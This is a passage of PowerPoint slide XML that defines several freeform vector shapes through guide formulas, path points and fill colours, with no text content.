                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 7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77"/>
                  <a:gd name="T59" fmla="*/ 19 w 19"/>
                  <a:gd name="T60" fmla="*/ 77 h 7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77">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10791" name="Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1961" y="2324"/>
                <a:ext cx="15" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 2 h 65"/>
                  <a:gd name="T4" fmla="*/ 14 w 15"/>
                  <a:gd name="T5" fmla="*/ 3 h 65"/>
                  <a:gd name="T6" fmla="*/ 13 w 15"/>
                  <a:gd name="T7" fmla="*/ 6 h 65"/>
                  <a:gd name="T8" fmla="*/ 12 w 15"/>
                  <a:gd name="T9" fmla="*/ 12 h 65"/>
                  <a:gd name="T10" fmla="*/ 11 w 15"/>
                  <a:gd name="T11" fmla="*/ 20 h 65"/>
                  <a:gd name="T12" fmla="*/ 10 w 15"/>
                  <a:gd name="T13" fmla="*/ 31 h 65"/>
                  <a:gd name="T14" fmla="*/ 11 w 15"/>
                  <a:gd name="T15" fmla="*/ 46 h 65"/>
                  <a:gd name="T16" fmla="*/ 12 w 15"/>
                  <a:gd name="T17" fmla="*/ 65 h 65"/>
                  <a:gd name="T18" fmla="*/ 3 w 15"/>
                  <a:gd name="T19" fmla="*/ 65 h 65"/>
                  <a:gd name="T20" fmla="*/ 3 w 15"/>
                  <a:gd name="T21" fmla="*/ 62 h 65"/>
                  <a:gd name="T22" fmla="*/ 1 w 15"/>
                  <a:gd name="T23" fmla="*/ 58 h 65"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>
                  <a:gd name="T25" fmla="*/ 50 h 65"/>
                  <a:gd name="T26" fmla="*/ 0 w 15"/>
                  <a:gd name="T27" fmla="*/ 40 h 65"/>
                  <a:gd name="T28" fmla="*/ 0 w 15"/>
                  <a:gd name="T29" fmla="*/ 30 h 65"/>
                  <a:gd name="T30" fmla="*/ 0 w 15"/>
                  <a:gd name="T31" fmla="*/ 19 h 65"/>
                  <a:gd name="T32" fmla="*/ 1 w 15"/>
                  <a:gd name="T33" fmla="*/ 9 h 65"/>
                  <a:gd name="T34" fmla="*/ 5 w 15"/>
                  <a:gd name="T35" fmla="*/ 0 h 65"/>
                  <a:gd name="T36" fmla="*/ 15 w 15"/>
                  <a:gd name="T37" fmla="*/ 0 h 6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65"/>
                  <a:gd name="T59" fmla="*/ 15 w 15"/>
                  <a:gd name="T60" fmla="*/ 65 h 6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65">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10792" name="Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1961" y="2330"/>
                <a:ext cx="13" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 13"/>
                  <a:gd name="T1" fmla="*/ 1 h 52"/>
                  <a:gd name="T2" fmla="*/ 13 w 13"/>
                  <a:gd name="T3" fmla="*/ 1 h 52"/>
                  <a:gd name="T4" fmla="*/ 12 w 13"/>
                  <a:gd name="T5" fmla="*/ 3 h 52"/>
                  <a:gd name="T6" fmla="*/ 11 w 13"/>
                  <a:gd name="T7" fmla="*/ 5 h 52"/>
                  <a:gd name="T8" fmla="*/ 10 w 13"/>
                  <a:gd name="T9" fmla="*/ 10 h 52"/>
                  <a:gd name="T10" fmla="*/ 10 w 13"/>
                  <a:gd name="T11" fmla="*/ 17 h 52"/>
                  <a:gd name="T12" fmla="*/ 8 w 13"/>
                  <a:gd name="T13" fmla="*/ 25 h 52"/>
                  <a:gd name="T14" fmla="*/ 8 w 13"/>
                  <a:gd name="T15" fmla="*/ 37 h 52"/>
                  <a:gd name="T16" fmla="*/ 10 w 13"/>
                  <a:gd name="T17" fmla="*/ 52 h 52"/>
                  <a:gd name="T18" fmla="*/ 3 w 13"/>
                  <a:gd name="T19" fmla="*/ 52 h 52"/>
                  <a:gd name="T20" fmla="*/ 3 w 13"/>
                  <a:gd name="T21" fmla="*/ 51 h 52"/>
                  <a:gd name="T22" fmla="*/ 3 w 13"/>
                  <a:gd name="T23" fmla="*/ 46 h 52"/>
                  <a:gd name="T24" fmla="*/ 1 w 13"/>
                  <a:gd name="T25" fmla="*/ 40 h 52"/>
                  <a:gd name="T26" fmla="*/ 1 w 13"/>
                  <a:gd name="T27" fmla="*/ 32 h 52"/>
                  <a:gd name="T28" fmla="*/ 0 w 13"/>
                  <a:gd name="T29" fmla="*/ 24 h 52"/>
                  <a:gd name="T30" fmla="*/ 1 w 13"/>
                  <a:gd name="T31" fmla="*/ 16 h 52"/>
                  <a:gd name="T32" fmla="*/ 3 w 13"/>
                  <a:gd name="T33" fmla="*/ 7 h 52"/>
                  <a:gd name="T34" fmla="*/ 5 w 13"/>
                  <a:gd name="T35" fmla="*/ 0 h 52"/>
                  <a:gd name="T36" fmla="*/ 13 w 13"/>
                  <a:gd name="T37" fmla="*/ 1 h 5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
                  <a:gd name="T58" fmla="*/ 0 h 52"/>
                  <a:gd name="T59" fmla="*/ 13 w 13"/>
                  <a:gd name="T60" fmla="*/ 52 h 5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 h="52">
                    <a:moveTo>
                      <a:pt x="13" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10793" name="Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1962" y="2337"/>
                <a:ext cx="10" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 10"/>
                  <a:gd name="T1" fmla="*/ 0 h 38"/>
                  <a:gd name="T2" fmla="*/ 10 w 10"/>
                  <a:gd name="T3" fmla="*/ 0 h 38"/>
                  <a:gd name="T4" fmla="*/ 9 w 10"/>
                  <a:gd name="T5" fmla="*/ 2 h 38"/>
                  <a:gd name="T6" fmla="*/ 9 w 10"/>
                  <a:gd name="T7" fmla="*/ 4 h 38"/>
                  <a:gd name="T8" fmla="*/ 7 w 10"/>
                  <a:gd name="T9" fmla="*/ 6 h 38"/>
                  <a:gd name="T10" fmla="*/ 6 w 10"/>
                  <a:gd name="T11" fmla="*/ 11 h 38"/>
                  <a:gd name="T12" fmla="*/ 6 w 10"/>
                  <a:gd name="T13" fmla="*/ 18 h 38"/>
                  <a:gd name="T14" fmla="*/ 6 w 10"/>
                  <a:gd name="T15" fmla="*/ 26 h 38"/>
                  <a:gd name="T16" fmla="*/ 7 w 10"/>
                  <a:gd name="T17" fmla="*/ 38 h 38"/>
                  <a:gd name="T18" fmla="*/ 3 w 10"/>
                  <a:gd name="T19" fmla="*/ 38 h 38"/>
                  <a:gd name="T20" fmla="*/ 2 w 10"/>
                  <a:gd name="T21" fmla="*/ 37 h 38"/>
                  <a:gd name="T22" fmla="*/ 2 w 10"/>
                  <a:gd name="T23" fmla="*/ 33 h 38"/>
                  <a:gd name="T24" fmla="*/ 2 w 10"/>
                  <a:gd name="T25" fmla="*/ 28 h 38"/>
                  <a:gd name="T26" fmla="*/ 0 w 10"/>
                  <a:gd name="T27" fmla="*/ 24 h 38"/>
                  <a:gd name="T28" fmla="*/ 0 w 10"/>
                  <a:gd name="T29" fmla="*/ 17 h 38"/>
                  <a:gd name="T30" fmla="*/ 0 w 10"/>
                  <a:gd name="T31" fmla="*/ 11 h 38"/>
                  <a:gd name="T32" fmla="*/ 2 w 10"/>
                  <a:gd name="T33" fmla="*/ 5 h 38"/>
                  <a:gd name="T34" fmla="*/ 4 w 10"/>
                  <a:gd name="T35" fmla="*/ 0 h 38"/>
                  <a:gd name="T36" fmla="*/ 10 w 10"/>
                  <a:gd name="T37" fmla="*/ 0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
                  <a:gd name="T58" fmla="*/ 0 h 38"/>
                  <a:gd name="T59" fmla="*/ 10 w 10"/>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 h="38">
                    <a:moveTo>
                      <a:pt x="10" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10794" name="Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1882" y="2326"/>
                <a:ext cx="45" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 45"/>
                  <a:gd name="T1" fmla="*/ 5 h 55"/>
                  <a:gd name="T2" fmla="*/ 3 w 45"/>
                  <a:gd name="T3" fmla="*/ 7 h 55"/>
                  <a:gd name="T4" fmla="*/ 2 w 45"/>
                  <a:gd name="T5" fmla="*/ 9 h 55"/>
                  <a:gd name="T6" fmla="*/ 1 w 45"/>
                  <a:gd name="T7" fmla="*/ 14 h 55"/>
                  <a:gd name="T8" fmla="*/ 0 w 45"/>
                  <a:gd name="T9" fmla="*/ 21 h 55"/>
                  <a:gd name="T10" fmla="*/ 0 w 45"/>
                  <a:gd name="T11" fmla="*/ 28 h 55"/>
                  <a:gd name="T12" fmla="*/ 0 w 45"/>
                  <a:gd name="T13" fmla="*/ 36 h 55"/>
                  <a:gd name="T14" fmla="*/ 0 w 45"/>
                  <a:gd name="T15" fmla="*/ 45 h 55"/>
                  <a:gd name="T16" fmla="*/ 2 w 45"/>
                  <a:gd name="T17" fmla="*/ 55 h 55"/>
                  <a:gd name="T18" fmla="*/ 2 w 45"/>
                  <a:gd name="T19" fmla="*/ 55 h 55"/>
                  <a:gd name="T20" fmla="*/ 2 w 45"/>
                  <a:gd name="T21" fmla="*/ 53 h 55"/>
                  <a:gd name="T22" fmla="*/ 2 w 45"/>
                  <a:gd name="T23" fmla="*/ 51 h 55"/>
                  <a:gd name="T24" fmla="*/ 2 w 45"/>
                  <a:gd name="T25" fmla="*/ 49 h 55"/>
                  <a:gd name="T26" fmla="*/ 2 w 45"/>
                  <a:gd name="T27" fmla="*/ 45 h 55"/>
                  <a:gd name="T28" fmla="*/ 3 w 45"/>
                  <a:gd name="T29" fmla="*/ 43 h 55"/>
                  <a:gd name="T30" fmla="*/ 3 w 45"/>
                  <a:gd name="T31" fmla="*/ 38 h 55"/>
                  <a:gd name="T32" fmla="*/ 5 w 45"/>
                  <a:gd name="T33" fmla="*/ 35 h 55"/>
                  <a:gd name="T34" fmla="*/ 6 w 45"/>
                  <a:gd name="T35" fmla="*/ 31 h 55"/>
                  <a:gd name="T36" fmla="*/ 7 w 45"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 8 w 45"/>
                  <a:gd name="T39" fmla="*/ 24 h 55"/>
                  <a:gd name="T40" fmla="*/ 10 w 45"/>
                  <a:gd name="T41" fmla="*/ 21 h 55"/>
                  <a:gd name="T42" fmla="*/ 14 w 45"/>
                  <a:gd name="T43" fmla="*/ 18 h 55"/>
                  <a:gd name="T44" fmla="*/ 16 w 45"/>
                  <a:gd name="T45" fmla="*/ 16 h 55"/>
                  <a:gd name="T46" fmla="*/ 21 w 45"/>
                  <a:gd name="T47" fmla="*/ 15 h 55"/>
                  <a:gd name="T48" fmla="*/ 26 w 45"/>
                  <a:gd name="T49" fmla="*/ 14 h 55"/>
                  <a:gd name="T50" fmla="*/ 26 w 45"/>
                  <a:gd name="T51" fmla="*/ 13 h 55"/>
                  <a:gd name="T52" fmla="*/ 26 w 45"/>
                  <a:gd name="T53" fmla="*/ 13 h 55"/>
                  <a:gd name="T54" fmla="*/ 28 w 45"/>
                  <a:gd name="T55" fmla="*/ 11 h 55"/>
                  <a:gd name="T56" fmla="*/ 29 w 45"/>
                  <a:gd name="T57" fmla="*/ 10 h 55"/>
                  <a:gd name="T58" fmla="*/ 33 w 45"/>
                  <a:gd name="T59" fmla="*/ 9 h 55"/>
                  <a:gd name="T60" fmla="*/ 36 w 45"/>
                  <a:gd name="T61" fmla="*/ 7 h 55"/>
                  <a:gd name="T62" fmla="*/ 41 w 45"/>
                  <a:gd name="T63" fmla="*/ 4 h 55"/>
                  <a:gd name="T64" fmla="*/ 45 w 45"/>
                  <a:gd name="T65" fmla="*/ 2 h 55"/>
                  <a:gd name="T66" fmla="*/ 45 w 45"/>
                  <a:gd name="T67" fmla="*/ 2 h 55"/>
                  <a:gd name="T68" fmla="*/ 44 w 45"/>
                  <a:gd name="T69" fmla="*/ 2 h 55"/>
                  <a:gd name="T70" fmla="*/ 43 w 45"/>
                  <a:gd name="T71" fmla="*/ 2 h 55"/>
                  <a:gd name="T72" fmla="*/ 42 w 45"/>
                  <a:gd name="T73" fmla="*/ 2 h 55"/>
                  <a:gd name="T74" fmla="*/ 40 w 45"/>
                  <a:gd name="T75" fmla="*/ 1 h 55"/>
                  <a:gd name="T76" fmla="*/ 37 w 45"/>
                  <a:gd name="T77" fmla="*/ 1 h 55"/>
                  <a:gd name="T78" fmla="*/ 35 w 45"/>
                  <a:gd name="T79" fmla="*/ 1 h 55"/>
                  <a:gd name="T80" fmla="*/ 31 w 45"/>
                  <a:gd name="T81" fmla="*/ 1 h 55"/>
                  <a:gd name="T82" fmla="*/ 28 w 45"/>
                  <a:gd name="T83" fmla="*/ 0 h 55"/>
                  <a:gd name="T84" fmla="*/ 26 w 45"/>
                  <a:gd name="T85" fmla="*/ 1 h 55"/>
                  <a:gd name="T86" fmla="*/ 22 w 45"/>
                  <a:gd name="T87" fmla="*/ 1 h 55"/>
                  <a:gd name="T88" fmla="*/ 19 w 45"/>
                  <a:gd name="T89" fmla="*/ 1 h 55"/>
                  <a:gd name="T90" fmla="*/ 14 w 45"/>
                  <a:gd name="T91" fmla="*/ 2 h 55"/>
                  <a:gd name="T92" fmla="*/ 10 w 45"/>
                  <a:gd name="T93" fmla="*/ 2 h 55"/>
                  <a:gd name="T94" fmla="*/ 7 w 45"/>
                  <a:gd name="T95" fmla="*/ 3 h 55"/>
                  <a:gd name="T96" fmla="*/ 3 w 45"/>
                  <a:gd name="T97" fmla="*/ 5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
                  <a:gd name="T148" fmla="*/ 0 h 55"/>
                  <a:gd name="T149" fmla="*/ 45 w 45"/>
                  <a:gd name="T150" fmla="*/ 55 h 5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 h="55">
                    <a:moveTo>
                      <a:pt x="3" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10795" name="Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1818" y="2367"/>
                <a:ext cx="37" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 7 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 7 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 5 h 10"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 5 h 10"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 4 h 10"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 3 h 10"/>
                  <a:gd name="T12" fmla="*/ 3 w 37"/>
                  <a:gd name="T13" fmla="*/ 3 h 10"/>
                  <a:gd name="T14" fmla="*/ 4 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 10"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 10"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 1 h 10"/>
                  <a:gd name="T20" fmla="*/ 11 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 10"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 10"/>
                  <a:gd name="T24" fmla="*/ 18 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 10"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 10"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 10"/>
                  <a:gd name="T30" fmla="*/ 31 w 37"/>
                  <a:gd name="T31" fmla="*/ 2 h 10"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 3 h 10"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 5 h 10"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 5 h 10"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 5 h 10"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 4 h 10"/>
                  <a:gd name="T42" fmla="*/ 32 w 37"/>
                  <a:gd name="T43" fmla="*/ 4 h 10"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 3 h 10"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
